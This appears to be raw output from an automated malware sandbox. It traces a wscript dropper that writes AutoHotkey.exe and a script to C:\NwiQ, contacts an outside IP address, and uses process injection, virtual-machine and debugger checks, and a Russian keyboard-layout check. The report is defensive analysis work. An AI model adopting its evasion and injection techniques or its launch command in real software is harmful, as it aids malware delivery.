Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: zipfldr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\System32\wscript.exe Section loaded: shdocvw.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winshfhc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wdscore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winshfhc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wdscore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\NwiQ\AutoHotkey.exe Section loaded: wsock32.dll
Source: C:\NwiQ\AutoHotkey.exe Section loaded: winmm.dll
Source: C:\NwiQ\AutoHotkey.exe Section loaded: version.dll
Source: C:\NwiQ\AutoHotkey.exe Section loaded: wininet.dll
Source: C:\NwiQ\AutoHotkey.exe Section loaded: kernel.appcore.dll
Source: C:\NwiQ\AutoHotkey.exe Section loaded: uxtheme.dll
Source: C:\NwiQ\AutoHotkey.exe Section loaded: textshaping.dll
Source: C:\NwiQ\AutoHotkey.exe Section loaded: urlmon.dll
Source: C:\NwiQ\AutoHotkey.exe Section loaded: iertutil.dll
Source: C:\NwiQ\AutoHotkey.exe Section loaded: srvcli.dll
Source: C:\NwiQ\AutoHotkey.exe Section loaded: netutils.dll
Source: C:\NwiQ\AutoHotkey.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run(""c:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk"", "1", "false");
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A5040 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004A5040
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0049F0E5 push ecx; ret 1_2_0049F0F8
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004AB418 push eax; ret 1_2_004AB436
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04878489 push 048784B5h; ret 1_2_048784AD
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0485F4A5 push 0485F4D1h; ret 1_2_0485F4C9
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0489A4A9 push 0489A4EBh; ret 1_2_0489A4E3
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048954E5 push 04895511h; ret 1_2_04895509
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486F4E9 push 0486F515h; ret 1_2_0486F50D
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048724F9 push ecx; mov dword ptr [esp], ecx 1_2_048724FE
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486D419 push 0486D445h; ret 1_2_0486D43D
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0487146D push 048714D7h; ret 1_2_048714CF
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486E471 push 0486E4B3h; ret 1_2_0486E4AB
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04868505 push 04868531h; ret 1_2_04868529
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0489A52D push 0489A559h; ret 1_2_0489A551
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04878531 push 0487855Dh; ret 1_2_04878555
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0484E565 push 0484E6E1h; ret 1_2_0484E6D9
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486A691 push 0486A6BDh; ret 1_2_0486A6B5
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048966A5 push 048966D1h; ret 1_2_048966C9
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048676C5 push 048676F1h; ret 1_2_048676E9
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486A6C9 push 0486A6F5h; ret 1_2_0486A6ED
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0484E6E5 push 0484E754h; ret 1_2_0484E74C
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0484E6E3 push 0484E754h; ret 1_2_0484E74C
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048676FD push 04867729h; ret 1_2_04867721
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04858615 push ecx; mov dword ptr [esp], edx 1_2_04858617
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04896629 push 0489665Ch; ret 1_2_04896654
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486578D push 048657B6h; ret 1_2_048657AE
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04867795 push 048677C1h; ret 1_2_048677B9
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0489779D push 048977DDh; ret 1_2_048977D5
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0489E791 push 0489E7B7h; ret 1_2_0489E7AF
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0484E79D push 0484E7C9h; ret 1_2_0484E7C1
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048677CD push 048677F9h; ret 1_2_048677F1
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0485B7D9 push 0485B805h; ret 1_2_0485B7FD
Source: C:\Windows\System32\wscript.exe File created: C:\NwiQ\AutoHotkey.exe Jump to dropped file
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00484030 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow, 1_2_00484030
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00484160 GetWindowThreadProcessId,GetWindowThreadProcessId,GetForegroundWindow,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,SetForegroundWindow,SetForegroundWindow,GetForegroundWindow,GetWindow,AttachThreadInput,AttachThreadInput,BringWindowToTop, 1_2_00484160
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004442E0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,_wcsrchr,__wcsicoll,__wcsicoll,__wcsicoll,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,__wcsnicmp,__fassign,__wcsnicmp,_wcsncpy,__fassign,__fassign,__fassign,__fassign,GetDC,DestroyIcon,DeleteObject,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,_free,_free,_free, 1_2_004442E0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045C3A0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC,__swprintf, 1_2_0045C3A0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004813B0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen, 1_2_004813B0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00481410 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen, 1_2_00481410
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004427E0 GetForegroundWindow,IsWindowVisible,GetWindowThreadProcessId,IsZoomed,IsIconic,GetWindowLongW,__swprintf,GetModuleHandleW,GetProcAddress,__swprintf, 1_2_004427E0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0046C900 GetWindowLongW,GetWindowLongW,GetWindowLongW,__wcsnicmp,__wcsnicmp,__wcsicoll,SetWindowPos,__wcsicoll,__wcsicoll,__wcsnicmp,__wcsicoll,__wcsicoll,__wcsicoll,EnableWindow,__wcsnicmp,__wcsnicmp,__wcsicoll,__wcsicoll,__wcsicoll,__wcsnicmp,MulDiv,MulDiv,__wcsnicmp,MulDiv,MulDiv,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcstoi64,IsWindow,SetParent,SetWindowLongW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect, 1_2_0046C900
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00443AD0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,__swprintf,ReleaseDC,SelectObject,DeleteDC,DeleteObject,_free,GetPixel,ReleaseDC, 1_2_00443AD0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00446BC0 GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,WindowFromPoint,EnumChildWindows,_memset,EnumChildWindows,GetClassNameW,EnumChildWindows, 1_2_00446BC0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00473B90 SendMessageW,SendMessageW,SendMessageW,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,GetPropW,ShowWindow,GetUpdateRect,SendMessageW,GetWindowLongW,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,PtInRect,SetFocus,SendMessageW,SendMessageW,ShowWindow,SetFocus,InvalidateRect,InvalidateRect,InvalidateRect,MapWindowPoints,InvalidateRect, 1_2_00473B90
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0046FCD0 SetWindowTextW,IsZoomed,IsIconic,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus, 1_2_0046FCD0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0046FCD0 SetWindowTextW,IsZoomed,IsIconic,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus, 1_2_0046FCD0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00445D30 SendMessageW,SendMessageW,SendMessageW,IsWindowVisible,ShowWindow,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageW, 1_2_00445D30
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0485D5DD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0485D5DD
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: SUPERANTISPYWARE.EXE
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Evaded block: after key decision
Source: C:\NwiQ\AutoHotkey.exe API coverage: 3.0 %
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004191F0 GetKeyboardLayout followed by cmp: cmp cl, 00000019h and CTI: ja 004192ECh country: Russian (ru) 1_2_004191F0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0040C240 GetKeyboardLayout followed by cmp: cmp dword ptr [004db42ch], edi and CTI: je 0040C414h 1_2_0040C240
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00480DC0 _wcschr,_wcschr,_wcschr,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose, 1_2_00480DC0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045E220 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,CoInitialize,CoCreateInstance,CoUninitialize, 1_2_0045E220
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0047C320 FindFirstFileW,FindClose,GetFileAttributesW,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle, 1_2_0047C320
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0044D570 FindFirstFileW,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,GetLastError,FindFirstFileW,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__swprintf,FindNextFileW,FindClose, 1_2_0044D570
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0044D870 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime, 1_2_0044D870
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00437B70 FindFirstFileW,FindNextFileW,FindClose,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindClose, 1_2_00437B70
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0044DBB0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 1_2_0044DBB0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00480D30 FindFirstFileW,FindClose,GetFileAttributesW, 1_2_00480D30
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045EEA0 GetFullPathNameW,GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,_wcsrchr,_wcsrchr,_wcsncpy,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,FindNextFileW,FindClose, 1_2_0045EEA0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048495A1 FindFirstFileA,GetLastError, 1_2_048495A1
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0489C541 FindFirstFileW,FindNextFileW,FindClose, 1_2_0489C541
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0484655D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 1_2_0484655D
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0489B145 FindFirstFileW,lstrcmpW,lstrcmpW,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FindNextFileW,FindClose, 1_2_0489B145
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04876FE5 FindFirstFileW,FindNextFileW,FindClose, 1_2_04876FE5
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04873871 FindFirstFileW,FindNextFileW,FindClose, 1_2_04873871
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04871EA9 GetSystemInfo, 1_2_04871EA9
Source: AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: vmware
Source: wscript.exe, 00000000.00000003.1651614571.000001D5A5F25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Registry\Machine\Software\Classes\SystemFileAssociations\compressed\SystemFileAssociations\compressed}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}stem32
Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: microsoft hyper-v video
Source: wscript.exe, 00000000.00000003.1655755076.000001D5A3CE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660535194.000001D5A5EE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1655755076.000001D5A3CE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWC
Source: AutoHotkey.exe, 00000001.00000002.1665231870.0000000000ACB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\NwiQ\AutoHotkey.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00416450 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,BlockInput,GetForegroundWindow,GetAsyncKeyState,keybd_event,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,BlockInput, 1_2_00416450
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0049E2D5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0049E2D5
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A5040 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004A5040
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486A0F5 mov eax, dword ptr fs:[00000030h] 1_2_0486A0F5
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486A0F5 mov eax, dword ptr fs:[00000030h] 1_2_0486A0F5
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04867B0D mov eax, dword ptr fs:[00000030h] 1_2_04867B0D
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048B3EEA mov eax, dword ptr fs:[00000030h] 1_2_048B3EEA
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A93DE __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 1_2_004A93DE
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0049E2D5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0049E2D5
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A1856 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_004A1856

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe File created: AutoHotkey.exe.0.dr Jump to dropped file
Source: C:\Windows\System32\wscript.exe Network Connect: 205.234.201.153 80 Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486DC09 CreateProcessA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle, 1_2_0486DC09
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486DC09 CreateProcessA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle, 1_2_0486DC09
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0043B100 GetFileAttributesW,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,_memset,__swprintf,CreateProcessW,CloseHandle,CloseHandle,GetLastError,_memset,__wcsicoll,_wcschr,SetCurrentDirectoryW,_wcschr,_wcschr,GetFileAttributesW,_wcschr,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW, 1_2_0043B100
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00418020 keybd_event,GetTickCount,GetForegroundWindow,GetWindowTextW, 1_2_00418020
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004172F0 GetAsyncKeyState,GetSystemMetrics,GetSystemMetrics,GetCursorPos,WindowFromPoint,GetWindowThreadProcessId,SendMessageW,mouse_event,mouse_event, 1_2_004172F0
Source: C:\Windows\System32\wscript.exe Process created: C:\NwiQ\AutoHotkey.exe "C:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk" Jump to behavior
Source: AutoHotkey.exe, 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe, 00000001.00000000.1655102872.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe.0.dr Binary or memory string: 5A`7ATextLEFTLRIGHTRMIDDLEMX1X2WUWDWLWR{Blind}{ClickLl{}^+!#{}RawTempASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt SYSTEM\CurrentControlSet\Control\Keyboard Layouts\Layout FileKbdLayerDescriptorsc%03Xvk%02XSCALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%uStdOutAllUnreachableClassOverwriteUseEnvLocalSameAsGlobalUseUnsetGlobalUseUnsetLocalYYYYYWeekYearYDayWorkingDirWinDirWinDelayWDayUserNameTitleMatchModeSpeedTitleMatchModeTimeSinceThisHotkeyTimeSincePriorHotkeyTimeIdlePhysicalTimeIdleMouseTimeIdleKeyboardTimeIdleTickCountThisMenuItemPosThisMenuItemThisMenuThisLabelThisHotkeyThisFuncStoreCapslockModeStartupCommonStartupStartMenuCommonStartMenuSecScriptNameScriptHwndScriptFullPathScriptDirScreenWidthScreenHeightScreenDPIRegViewPtrSizeProgramsCommonProgramsPriorKeyPriorHotkeyOSVersionOSTypeNumBatchLinesNowUTCNowMyDocumentsMSecMouseDelayPlayMouseDelayMonMMMMMMMMMMinMDayLoopRegTypeLoopRegTimeModifiedLoopRegSubKeyLoopRegNameLoopRegKeyLoopReadLineLoopFileTimeModifiedLoopFileTimeCreatedLoopFileTimeAccessedLoopFileSizeMBLoopFileSizeKBLoopFileSizeLoopFileShortPathLoopFileShortNameLoopFilePathLoopFileNameLoopFileLongPathLoopFileFullPathLoopFileExtLoopFileDirLoopFileAttribLoopFieldLineNumberLineFileLastErrorLanguageKeyDurationPlayKeyDurationKeyDelayPlayKeyDelayIsUnicodeIsSuspendedIsPausedIsCriticalIsCompiledIsAdminIs64bitOSIPAddress4IPAddress3IPAddress2IPAddress1InitialWorkingDirIndexIconTipIconNumberIconHiddenIconFileHourGuiYGuiXGuiWidthGuiHeightGuiEventGuiControlEventFormatIntegerFormatFloatExitReasonEventInfoEndCharDesktopCommonDesktopDefaultTreeViewDefaultMouseSpeedDefaultListViewDefaultGuiDDDDDDDDDCursorCoordModeToolTipCoordModePixelCoordModeMouseCoordModeMenuCoordModeCaretControlDelayComputerNameCaretYCaretXBatchLinesAppDataCommonAppDataAhkVersionAhkPathTrueProgramFilesFalseComSpecClipboardAllClipboard...%s[%Iu of %Iu]: %-1.60s%sPropertyRegExMatch\:\:REG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264MasterSpeakersHeadphonesDigitalLineMicrophoneSynthCDTelephonePCSpeakerWaveAuxAnalogVolVolumeOnOffMuteMonoLoudnessStereoEnhBassBoostPanQSoundPanBassTrebleEqualizerRegExFASTSLOWMonitorCountMonitorPrimaryMonitorMonitorWorkAreaMonitorNameAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightShowAddRenameCheckUncheckToggleCheckEnableDisableToggleEnableStandardNoStandardColorNoDefaultDeleteAllTipIconNoIconMainWindowNoMainWindowSubmitCancelHideMinimizeMaximizeRestoreDestroyMarginFontListViewTreeViewFlashNewMoveMoveDrawFocusChooseChooseStringPosFocusVEnabledVisibleHwndNameButtonCheckboxRadioDDLDropDownListComboBoxListBoxUpDownSliderTab2Tab3GroupBoxPicPictureDateTimeMonthCalStatusBarActiveXLinkCustomPriorityInterruptNoTimersCloseWaitCloseStyleExStyleShowDropDownHideDropDownTabLeftTabRightEditPasteCheckedFindStringChoiceListLineCountCurrentLineCurrentColSelectedEjectLockUnlockLabelFileSystemFSSetLabel:SerialTypeS
Source: AutoHotkey.exe Binary or memory string: Program Manager
Source: AutoHotkey.exe Binary or memory string: Shell_TrayWnd
